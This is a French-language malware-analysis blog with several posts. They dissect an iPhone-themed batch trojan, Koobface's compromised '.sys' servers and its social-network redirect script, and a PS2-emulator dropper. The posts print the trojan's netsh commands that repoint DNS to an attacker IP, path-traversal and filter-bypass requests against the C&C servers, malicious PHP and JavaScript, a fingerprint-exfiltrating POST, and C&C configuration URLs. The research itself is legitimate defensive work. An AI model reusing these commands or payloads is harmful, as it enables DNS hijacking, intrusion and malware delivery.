Malware Analysis & Diagnostic

iPhone - Trojan.BAT.AACL

nospam@example.com (Joe) — Thu, 15 Apr 2010 08:21:00 +0200

Plusieurs messages ce matin pour des informations relatives aux articles publiés sur les communautés d'accros aux iPhone, iPad, etc... des billets alarmistes comme: "Un nouveau Trojan menace la sécurité des PC et des iPhone" - rassurez-vous, vous pourrez continuer à bidouiller vos jouets, il ne s'agit que d'un petit fichier batch.

C:\WINDOWS\system32\netsh.exe interface ip set dns "Local Area Connection" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "wireles network connection" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "Local Area Connection 2" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "Local Area Connection 1" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "wireles network connection 1" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "wireles network connection 2" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "LAN" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "LAN 1" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "LAN 2" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "WAN" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "WAN 1" static 188.210.236.250
C:\WINDOWS\system32\netsh.exe interface ip set dns "WAN 2" static 188.210.236.250

MalwareCity (BitDefender) - iPhone Unlocking Tricks get PCs into Trouble
Dancho Danchev - iPhone Unlocking Themed Malware Campaign Spamvertised

Les faiblesses des scripts Koobface peuvent taper sur le .sys

nospam@example.com (Matt) — Wed, 24 Mar 2010 11:24:32 +0100

Voilà maintenant de très nombreux mois que j'attendais une opportunité permettant d'introduire quelques remarques en relation avec Koobface. Un message du SANS - ".sys" Directories Delivering Driveby Downloads complété par un billet du ScanSafe STAT Blog - A peu près tous les chercheurs ont exploités les faiblesses et maladresses du gang Ali baba & 40 , les auteurs de Koobface. C'est par messages dissimulés qu'ils communiquent leurs humeurs. Par exemple: "We express our high gratitude to Dancho Danchev for the help in bug fixing, researches and documentation for our software." et encore bien d'autres comme FireEye, Gary Warner, ...

Début 2009, avant notre billet Koobface: La confiance accordée à vos relations doit cesser. nous avions tenté de décortiquer les liens, caractéristiques, fonctionnalités, arguments, valeurs, ... et nous avions vite repéré les faiblesses. Pour comprendre, prenons un exemple:

http://........../.sys/?action=ldgen&a=1&v=14&l=1&c_fb=1&c_ms=1&c_hi=1&c_tw=1&c_be=1&c_tg=1&c_nl=1

#BLACKLABEL
#GEO=FR
#IP=x.x.x.x
USELIGHT|1
START|http://.............../.sys/?getexe=p.exe
START|http://.............../.sys/?getexe=pp.14.exe
START|http://.............../.sys/?getexe=v2newblogger.exe
START|http://.............../.sys/?getexe=v2bloggerjs.exe
START|http://.............../.sys/?getexe=v2captcha21.exe
STARTONCE|http://.............../.sys/?getexe=hosts2.exe
STARTONCE|http://.............../.sys/?getexe=go.exe
STARTONCE|http://.............../.sys/?getexe=v2webserver.exe
MD5|21a877ca943fbd7725c3bd7a2ca87ab1

Vous constatez que la présence du ".sys" est effectivement caractéristique.

A l'époque, il était possible de consulter n'importe quel fichier sur les serveurs web distants en exploitant une vulnérabilité de type LFI

http://.........../.sys/?getexe=exemple.txt

En utilisant un parcours récursif, nous avions démontré qu'il était possible d'extraire les données des fichiers sensibles.

http://.........../.sys/?getexe=./../../../../../../../etc/passwd

Après corrections, certaines requêtes passaient encore.

http://.........../.sys/?getexe=.htaccess

Ce qui était très pratique, il faut l'avouer, mais nouvelles corrections.

http://.........../.sys/?getexe=index.php

En imaginant comment ils auraient pu corriger, il a été facile de bypass les vérifications.

GET /.sys/?getexe=i/n/d/e/x.php

<?
/*
if ($_REQUEST['file'] == "gr.05.exe"){
$fp = fopen("qqq.txt","a+");
fputs($fp, date("Y-m-d H:i:s\t").$_REQUEST['ip']."\t".$_SERVER['REMOTE_ADDR']."\n");
fclose($fp);
}
*/
$dd = date("YmdH");
$dd = ($dd == "2009120318" || $dd == "2009120319" || $dd == "2009120320" || $dd == "2009120321" || $dd == "2009120322");

if (isset($_REQUEST['file']) && $_REQUEST['file'] == "test") {
print "KROTEG";
exit();
}

if (isset($_REQUEST['file']) && strlen($_REQUEST['file'])>0 && $_REQUEST['file'] != "index.php") {
$fname = preg_replace("#[^a-z\.0-9]#is", "", $_REQUEST['file']);

/*
if ($fname == "tw.04.exe") {

    $fp=fopen("tw.txt","a+");
    if ($fp)
    {

     fwrite($fp,"1");
     fclose($fp);
    }

}
*/

$cont = file_get_contents($fname);
$size = strlen($cont);
header("Content-Type: application/octet-stream");
header("Cache-Control: private", false);
header("Content-Transfer-Encoding: binary");
header("Accept-Ranges: bytes\r\n");
header("Content-Length: " . $size . "\r\n");
header("Content-Disposition: inline; filename=".$fname);
print $cont;

if ($dd) {
    $fp = fopen("file.log", "a+");
    fputs($fp, date('r') . "|" . $_REQUEST['ip'] . "|" . $_SERVER['REMOTE_ADDR'] . "|" . $_REQUEST['file'] . "\n");
    fclose($fp);

    if (isset($_REQUEST['ip'])) {
     $fp = fopen("bad.log", "a+");
     fputs($fp, $_REQUEST['ip'] . "\n");
     fclose($fp);
    }

    $fp = fopen("sys2.log", "a+");
    fputs($fp, $_SERVER['REMOTE_ADDR'] . "\n");
    fclose($fp);
}
} else if (isset($_REQUEST['file2']) && strlen($_REQUEST['file2'])>0 && $_REQUEST['file2'] != "index.php") {
$fname = preg_replace("#[^a-z\.0-9]#is", "", $_REQUEST['file2']);
/*
if ($fname == "tw.04.exe") {

    $fp=fopen("tw.txt","a+");
    if ($fp)
    {

     fwrite($fp,"1");
     fclose($fp);
    }

}
*/
$cont = file_get_contents($fname);
$size = strlen($cont);
header("Content-Type: application/octet-stream");
header("Cache-Control: private", false);
header("Content-Transfer-Encoding: binary");
header("Accept-Ranges: bytes\r\n");
header("Content-Length: " . $size . "\r\n");
header("Content-Disposition: inline; filename=".$fname);
print $cont;

if ($dd) {
    $fp = fopen("file2.log", "a+");
    fputs($fp, date('r') . "|" . $_REQUEST['ip'] . "|" . $_SERVER['REMOTE_ADDR'] . "|" . $_REQUEST['file2'] . "\n");
    fclose($fp);
}
}

exit ;
?>

Ce n'est qu'un exemple permettant d'illustrer l'étendu des énormités. Le pire dans l'histoire, au cas où vous n'auriez pas encore compris, c'est que ces serveurs sont piratés, ils n'appartiennent pas aux cybercriminels. J'ai ainsi observé des cas d'intrusions et compromissions qui ont été facilités suite à la fuite d'informations sensibles liées à ces brèches antérieures. C'est dans ces moments là qu'on apprécie Snort et ses règles.

- How Koobface has evolved to stay a step ahead
- How Facebook phishers breached a corporate network
- Koobface C&C servers steadily dropping - new spike coming soon?

Malware : PS2 Emulators - Play 2 Emulator ?

nospam@example.com (Joe) — Fri, 12 Mar 2010 18:54:00 +0100

Exploiter les péchés des Hommes demeure la recette à succès par excellence - les distributions s'effectuent par le biais de diverses "vitrines".
Avec des mots clés comme: "FREE", "PORN", "MONEY", "WAREZ", "CRACK", "SERIAL", "PATCH", "KEYGEN", ...
Le pire dans l'histoire, c'est que l'internaute a la sensation de réaliser une "bonne affaire", bien conditionné, il va commettre des imprudences.
Il constatera peut-être, à sa grande surprise, qu'il s'est fait duper et qu'il en subira durement les conséquences.
Vous avez fauté ? Tant pis pour vous et cessez d'imaginer qu'un nettoyage sera LA solution.
Comme on dit, "Café bouillu, café foutu!" ( Coffee boiled, is coffee spoiled! )

Ces faux portails et faux blogs vous proposent de télécharger gratuitement des applications, aussi bien pour vos ordinateurs que vos téléphones et toutes sortes d'appareils, ... et l'article de Christopher Boyd (aka PaperGhost) intitulé "Consoles for old games come with new malcode" souligne que les consoles de jeux ( émulateurs ) semblent être de bons appâts. Ce qui a particulièrement attiré notre attention, c'est cette remarque:

Download and run any of the above files | all hosted at movieutilitesonline(dot)com

and you'll probably be wondering where the alleged emulator is that is "by far superior

to all other PS2 Emulators released before it." A pair of files will be dropped onto

your PC, including a randomly named executable in the Windows directory and xpysys.dll

in your System32 Folder. In some cases, people have reported this particular attack

resulting in rogue antivirus appearing on the compromised system – however, during

testing nothing was downloaded onto the PC. This doesn't mean it won't happen...

Comme nous surveillons ces activités et que nous n'avions pas décelé d'anomalies sur ces derniers échantillons, cela nous a intrigués. Nous avons contacté Chris B. over Twitter pour obtenir des infos complémentaires sur sa configuration au moment des tests. Puis après quelques manipulations, nous sommes arrivés à la conclusion que ce dropper, chargé de déposer la bibliothèque dans %windir%\system32, comportait une anomalie sur son packer. Pendant nos investigations, nous avons été étonné de l'absence de détails, d'informations, sur ces fichiers et c'est principalement la raison de ce billet.

Nous ne détaillerons pas le circuit de distribution, on peux simplement dire que des noms de domaines sont enregistrés au préalables et que chaque jour plusieurs sont "activés". La fréquence des modifications sur les pages des affiliés est élevée. Ci-dessous, les configurations des derniers "lots" de DNS.

AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name

16265 | 62.212.66.81 | 62.212.64.0/19 | NL | ripencc | 2000-06-22 | LEASEWEB LEASEWEB AS

16265 | 62.212.66.108 | 62.212.64.0/19 | NL | ripencc | 2000-06-22 | LEASEWEB LEASEWEB AS

21788 | 64.120.141.6 | 64.120.128.0/18 | US | arin | 2009-04-27 | NOC | Network Operations Center Inc.

19318 | 69.10.38.27 | 69.10.32.0/20 | US | arin | 2007-04-11 | NJIIX-AS-1 | NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC

Chaque programme téléchargé aura sa signature unique car à chaque requête le PE est " tagué " de plusieurs bytes.
Les noms des fichiers sont générés en fonction de l'url, il s'agit d'une ré-écriture de l'entête:

http://movieutilitesonline.com/HelloWorld.Keygen.1337.exe
-- Content-Disposition: attachment;filename=HelloWorld.Keygen.1337.exe

Quant aux packers, de la même manière, les "lots" ont leurs propres caractéristiques.

17/02/2010 21:46:05:57 | MULTIMEDIAPLUGIN.COM | 91 136 | 0000262D | 00001A2D | CODE | 3.4
18/02/2010 00:00:00:01 | MEDIACANOPIES.COM | 91 136 | 0000262D | 00001A2D | CODE | 3.4
...
20/02/2010 22:54:58:04 | FILMUTILITES.COM | 92 672 | 00001F50 | 00001350 | CODE | 3.1
21/02/2010 02:18:44:54 | MEDIAGOSS.COM | 92 672 | 00001F50 | 00001350 | CODE | 3.1
21/02/2010 10:14:33:14 | OMNIGLOBALMEDIA.COM | 92 672 | 00001F50 | 00001350 | CODE | 3.1
21/02/2010 23:11:22:39 | PLAINMULTIMEDIA.COM | 92 672 | 00001F50 | 00001350 | CODE | 3.1
...
22/02/2010 23:48:45:56 | SUPERFILESNOW.COM | 94 208 | 00002449 | 00001849 | .text | 4.1
23/02/2010 09:48:07:21 | MEGAFILESMEDIA.COM | 94 208 | 00002449 | 00001849 | .text | 4.1
...

Revenons aux échantillons du lot associé au billet de SunbeltBlog.

10/03/2010 14:58:32:99 | MOVIEUTILITESONLINE.COM | 105 472 | Unknown | 00006B03 | 00005F03 | .text | 2.25

Point commun avec les précédents packers, ces fichiers ne peuvent être analysés sous TE.
Sur cette vidéo d'unpacking, la première session concerne ce packer et la deuxième ceux des fichiers téléchargés.
Comme la plupart des bestioles, la première étape consiste à récupérer des informations.

LCID GetUserDefaultLCID(void);

BOOL WINAPI GetVolumeInformation(
__in_opt   LPCTSTR lpRootPathName,
__out      LPTSTR lpVolumeNameBuffer,
__in       DWORD nVolumeNameSize,
__out_opt LPDWORD lpVolumeSerialNumber,
__out_opt LPDWORD lpMaximumComponentLength,
__out_opt LPDWORD lpFileSystemFlags,
__out      LPTSTR lpFileSystemNameBuffer,
__in       DWORD nFileSystemNameSize
);

BOOL SHGetSpecialFolderPath(
    HWND hwndOwner,
    LPTSTR lpszPath,
    int csidl,
    BOOL fCreate
);

DWORD WINAPI GetEnvironmentVariable(
__in_opt   LPCTSTR lpName,
__out_opt LPTSTR lpBuffer,
__in       DWORD nSize
);

int PathGetDriveNumber(
    LPCTSTR lpsz
);

etc... je vais juste introduire l'utilisation de DeviceIoControl qui doit ressembler à:

HANDLE hPhysicalDriveIOCTL = 0;
hPhysicalDriveIOCTL = CreateFile ("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
DeviceIoControl (hPhysicalDriveIOCTL, 0x2D1400, NULL, 0,
& buffer, sizeof (buffer), & cbBytesReturned, NULL);

Ce qui permet d'extraire des informations comme:
Label: LEET HARDDISK
Version: 1.0
Serial: B00B00B00B00B00B00B00B00B00B00B00B00B00B
Size: 1337
...

Ce lot de données est envoyé par la suite dans une requête en méthode POST.
L'identification de la fonction de hachage cryptographique est aisée,

01 23 45 67 89 AB CD EF FE DC BA 98 76 54 32 10   .#Eg........vT2.

Il s'agit tout simplement de MD5
Lors de mon test, mes informations étaient les suivantes: "LEET HARDDISK1.0VB8637c3bf-5c5a0f3e "
La variable "a1" sera construite ainsi: "13371337" + "25fc74d877cd3f05bf460225015ca2b5"
Ensuite la variable "a2" correspondra à la valeur retournée par la fonction GetTickCount.
Et enfin la variable "cd" utilisera des chaines ASCII hardcodées permettant d'agir comme "horodateur".
Au final, nous obtenons quelque chose sous la forme:

"a2=0000b0a6&a1=1337133725fc74d877cd3f05bf460225015ca2b5&cd=Mar 9 2010,12:55:55"

D'autres informations sont ainsi récupérées, cryptées et encodées en base64 puis envoyées aux pirates.
Ci-dessous, une démonstration détaillée des étapes successives.

Le programme va ensuite décoder ses DNS hardcodés, en général au nombre de 3, ici:

- ANGELHOUSEARTS.COM
- BESTHOMEARTS.COM
- SUPERSTYLEMEDIA.COM

Puis va concatèner toutes ces informations et forger les futures requêtes.
Noms de domaines, noms de pages, noms de variables sont déterminés dans le binaire.
La méthode POST sera toujours utilisée, de même pour le User-Agent défini à "wget 3.0"
Si une anomalie a été détectée alors la valeur de "Content-Type" sera erronée:
Exemple: "Content-Type: application/x-www-form-urlenqoded"
Ce qui permet ainsi d'invalider la requête, malin...

[+] wininet.InternetCrackUrlA
   ---- WS2_32
   + WSAStartup
   + gethostbyname
   + socket
   + ntohs
   + connect
   + getsockopt
   + send
   + recv
   + closesocket
   + WSACleanup

POST /mnhbckjmdhckj.php?q=...
Content-Type: application/x-www-form-urlencoded
Host: besthomearts.com
User-Agent: wget 3.0
Content-Length: 121
Connection: close
Cache-Control: no-cache
data=...

Pour résumer, la première variable de l'url contiendra les valeurs des variables ("a1"+"a2"+"cd") tandis que la variable "data" contiendra les valeurs des variables ("debug"+"admin"+"os"). La réponse du serveur distant correspond à un fichier de configuration XML crypté.

Il faut imaginer que toutes ces actions sont réalisées sur une machine moderne en l'espace d'une fraction de seconde. En utilisant ce fichier d'échange crypté, les pirates peuvent contourner une grande variété de solutions de filtrages et ensuite piloter vos ordinateurs. Dans ce cas d'étude, le programme va effectuer une lecture par découpage (parsing) de la configuration et on observe très clairement que 3 fichiers peu ou pas détectés par vos solutions antivirus. Deux ordinateurs infectés par un même fichier peuvent avoir des infections multiples et symptômes différents. Des gif ? D'après l'entête des fichiers, on pourrait croire qu'effectivement qu'il s'agit d'images valides, en réalité il s'agit de PE cryptés qui seront téléchargés dans le répertoire %tmp%.

Au moment du test, les fichiers téléchargés étaient:
f55c8ea72c66d48934f85f1368e6404c - 154 112 - [HomePacker(Layer(UPX))]
d8ad2ac5204e5d2940308e0fafb73d25 - 162 816 - [HomePacker(Layer(UPX))]

Et le fichier 4c42b50a3d0b216894d497a399f4c1f4 de 235008 octets qui correspond au dropper.
Quelques mots sur cette librairie, elle commence par décrypter ses chaines de caractères, API et config embarquée.
Note: Si quelqu'un sait à quoi correspond la chaine ASCII "Canaveral", contactez-moi, merci.

<zippo>
   <url post="on"><![CDATA[http://yourgot.com/oms.php]]></url>
   <url post="on"><![CDATA[http://safarel.com/oms.php]]></url>
   <url crypt="on" post="on"><![CDATA[http://soilness.com/oms.php]]></url>
</zippo>

<gi>
   <url get="on"><![CDATA[http://proting.com/tbd.php?e=]]></url>
   <url get="on"><![CDATA[http://theour.com/tbd.php?e=]]></url>
   <url get="on" crypt="on"><![CDATA[http://foralllife.com/tbd.php?e=]]></url>
</gi>

Cette fois les requêtes sont effectuées avec "User-Agent: XML"
Les informations cryptés sont stockées dans la base de registre:
HKEY_CURRENT_USER\Software\Microsoft\Handle\...

Et ça ressemble à ça déchiffré:

<root>
        <config>

                <url post="on"><![CDATA[http://yourgot.com/oms.php]]></url>
                <url post="on" crypt="on"><![CDATA[http://soilness.com/oms.php]]></url>

        </config>

        <gi>

                <url get="on"><![CDATA[http://proting.com/tbd.php?e=]]></url>
                <url get="on"><![CDATA[http://theour.com/tbd.php?e=]]></url>
                <url get="on" crypt="on"><![CDATA[http://foralllife.com/tbd.php?e=]]></url>

                <searchperday>inf</searchperday>
                <clicksperday>inf</clicksperday>
                <pause>5</pause>
        </gi>
</root>

Informations sur les DNS associés aux fichiers de configuration.

yourgot | 7796 | 216.240.157.88 | 216.240.144.0/20 | US | arin | 1999-09-22 | ATMLINK - ATMLINK, INC.

safarel | NA | 185.239.210.1 | NA | | | | NA

proting | 36351 | 208.43.125.181 | 208.43.64.0/18 | US | arin | 2008-04-22 | SOFTLAYER - SoftLayer Technologies Inc.

theour | 46636 | 88.214.205.199 | 88.214.192.0/20 | GB | ripencc | 2006-01-18 | NATCOWEB - NatCoWeb Corp.

foralllife | 34984 | 217.131.120.61 | 217.131.96.0/19 | TR | ripencc | 2001-01-22 | TELLCOM-AS Tellcom Iletisim Hizmetleri

... Il y a quantité de choses à détailler et commenter mais pas sûr que "tout le monde" apprécie.

Rappel: Principes essentiels de la sécurité informatique - Chapitre: "Télécharger prudemment"

Si vous avez un compte Twitter, suivez l'actualité avec nos amis francophones, @Siri_URZ ; @CedricPernet ; @NicolasBrulez ; etc...
pour + de contacts: @MalwareScene - pour conclure, un grand bravo à Matthieu Suiche ( Microsoft Security MVP + MoonSols )

Koobface: La confiance accordée à vos relations doit cesser.

nospam@example.com (Joe) — Mon, 18 May 2009 17:24:00 +0200

Win32/Koobface is a multi-component family of malware used to compromise machines and direct them in various ways at the attacker's will. This could include using the affected machine to distribute additional malware, generate 'pay per click' advertising revenue, steal sensitive data, break captchas, and subvert the affected user's online experience. Its components are varied, but include a worm that spreads by utilizing social networking sites such as Facebook and MySpace.

Mai 2009, le ver "Koobface" anagramme de "FaceBook" arrive dans le TOP5 des familles derrière Taterf, Frethog et Alureon. Koobface n'est pas une nouveauté, certes, mais il est toujours bon de s'informer sur les techniques utilisées et d'avoir conscience des risques potentiels que comportent nos gestes du quotidien ça permet entre autre d'accroître notre vigilance et d'éviter les pièges.

Oh..oh.. you clicked too much!

Scénario: L'utilisateur se connecte à son compte "Facebook", dans sa boîte de réception, un message accompagné d'un lien inconnu. Un réflexe adopté par cetains internautes consiste à vérifier le nom du site dans Google, ici tout semble normal: la page d'accueil à l'air sérieuse et pourtant.. il s'agit d'un site légitime ayant été détourné pour l'occasion et qui héberge des scripts malveillants, regardez plutôt la suite.

Admettons que l'utilisateur décide de cliquer sur le lien reçu dans sa boîte de réception. Une page va s'afficher, elle aura l'apparence d'une page à l'effigie d'un site dit de confiance: "YouTube." Une personne informée des risques qui existent sur Internet remarquera rapidement que la barre d'adresse n'affiche pas "youtube.com" et l'anomalie de la fausse page qui a pour titre "YuoTube". La mise en scène - une fois la page chargée, vous découvrez un message qui vous informe que vous ne disposez pas du nécessaire pour visualiser le contenu, ici la "Secret Video", et on vous demande explicitement si vous souhaitez accepter ou refuser le téléchargement d'un programme dont le nom vous évoque quelque chose que vous avez déjà lu quelque part, dans ce cas précis: "FlashPlayer". Si la personne télécharge et exécute ce faux lecteur alors sa machine va être infectée.

Quand l'utilisateur clique sur le lien qui est contenu dans le message "Facebook", la page renvoyée se présente sous cette forme:

let go<script src=w1v9gpe7pm.js>a=b</script>to cool video

Le fichier script "w1v9gpe7pm.js" contient:

var abc1 = 'http://redir0705.com/go/';
var abc2 = 'http://redir0805.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com',    abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com',   abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com',     abc+'fu.php'],
['hi5.com',       abc+'hi5.php'],
['bebo.com',      abc+'be.php']
];
var s = '' + document.referrer, r = false;
for (var i = 0; i < redirects.length; i ++) {
if ((s.indexOf(redirects[i][0]) != -1)) {
     var redir=redirects[i][1] + location.search;
     if ((location.search).length>0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
     location.href = redir;
     r = true;
     break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;

Les valeurs des variables "abc1" et "abc2" du script correspondent à des DNS qui sont tout deux configurés sur le même serveur chez TM Net situé dans la capitale de la Malaisie, Kuala Lumpur. La composition de ces noms de domaines permet de révéler un indicateur temporel quant à la date de mise en service: redir+0705 et redir:0805. Autres exemples observés par le passé, redir+2404.com qui pointe aussi sur ce même serveur par contre redir+2404.com pointe sur un serveur basé à Pékin en Chine. Le navigateur va donc interpréter ce code javascript et en fonction des variables va rediriger vers "redir????.com/go/index.php" ; le serveur va répondre avec pour entête de réponse un champs nommé "Location" qui contient l'adresse sur laquelle le navigateur doit être redirigé. A chaque nouvelle requête, un mécanisme (non détaillé) fait en sorte que la valeur renvoyée, en l'occurrence l'adresse IP, soit toujours différente. En principe les éléments qui composent la fausse page "YouTube" sont les mêmes:

- "%serveur%/player.swf" ; Une animation Flash qui simule l'absence de Flash. (le comble)
- "%serveur%/tom.jpg" ; Un avatar situé en haut à droite sur la capture d'écran.
- "%serveur%/setup.exe" ; Un programme malveillant.

A chaque nouvelle adresse IP, un programme différent, sûrement dans le but de contourner les antivirus qui se baseraient uniquement sur les détections par fichiers de signatures. Différents ? Non, pas vraiment. Seule l'empreinte change grâce à de faibles variations opérées (non détaillées) par un remplacement de quelques bytes à un offset (position) précis. Ci-dessous, une schématisation: en rouge le nom des réseaux sociaux avec leur rank entre parenthèses (sources: Alexa) et en jaune la codification utilisée par les scripts / programmes.

Une fois le programme exécuté, il va indiquer à ses propriétaires qu'il est opérationnel et va réaliser divers téléchargements qui seront adaptés en fonction de la configuration de la personne infectée puis veillera à bien tenir à jour sa panoplie de programmes (1). A son tour, votre ordinateur va envoyer des messages qui iront peut être infecter d'autres personnes (2).

Et on revient au point de départ, c'est cyclique.
Mais que fait ~~la police~~ la bande à Ali Baba...

Liens connexes:
- Anti-Social Networking ( March 10, 2009 - Scott Molenkamp ; MMPC )
- MSRT and an Update of Worms in the Wild ( May 4, 2009 - Jeremy Croy ; MMPC )
- Koobface: tirando del hilo ( May 20, 2009 - Jose Miguel Esparza ; S21sec e-crime )
- Koobface Worm Alive and Wriggling ( May 20, 2009 - JM Hipolito ; Trend Micro )
- The Allure of Social Networking ( May 31, 2009 - Methusela Cebrian Ferrer ; Trend Micro )
- Koobface Re-Activated! ( June 16, 2009 - Ricardo Robielos )
- Ali Baba and the Forty Thieves ( June 19, 2009 - Jerome Segura )
- Koobface Tweets ( June 25, 2009 - Jonell Baltazar )
- Dissecting Koobface Worm's Twitter Campaign ( July 15, 2009 - Dancho Danchev )
- New KOOBFACE Upgrade Makes It Takedown-Proof ( July 22, 2009 - Jonell Baltazar )
- Koobface - Come Out, Come Out, Wherever You Are ( July 22, 2009 - Dancho Danchev )
- Movement on the Koobface Front ( August 4, 2009 - Dancho Danchev )
- The Real Face of KOOBFACE ( August 6, 2009 - Ryan Flores )
- New tricks for Koobface ( August 6, 2009 - Stefan )
- Tertwit? or Twitter Tweet Links Redirect to Koobface ( August 7, 2009 - ThreatFire )
- Koobface New Status Update... ( August 14, 2009 - Mary Grace Gabriel )
- Koobface: The saga continues ( August 14, 2009 - Sean-Paul Correll )
- Koobface Ramps Up Its Twitter Campaign ( August 17, 2009 - Joey Costoya )
- Movement on the Koobface Front - Part Two ( August 19, 2009 - Dancho Danchev )
- Koobface 0x3e8 Folders and Links ( August 19, 2009 - ThreatFire )
- Koobface Botnet's Scareware Business Model ( September 16, 2009 - Dancho Danchev )
- Koobface, Gumblar, Slowloris, Antisec ( September 18, 2009 - ActuSécu XMCO n°23 )
- Koobface Botnet Dissected in a TrendMicro Report ( October 14, 2009 - Dancho Danchev )
- Koobface Botnet's Scareware Business Model - Part Two ( November 11, 2009 - Dancho Danchev )
- Koobface – the social network trojan ( December 6, 2009 - The Swiss Security Blog )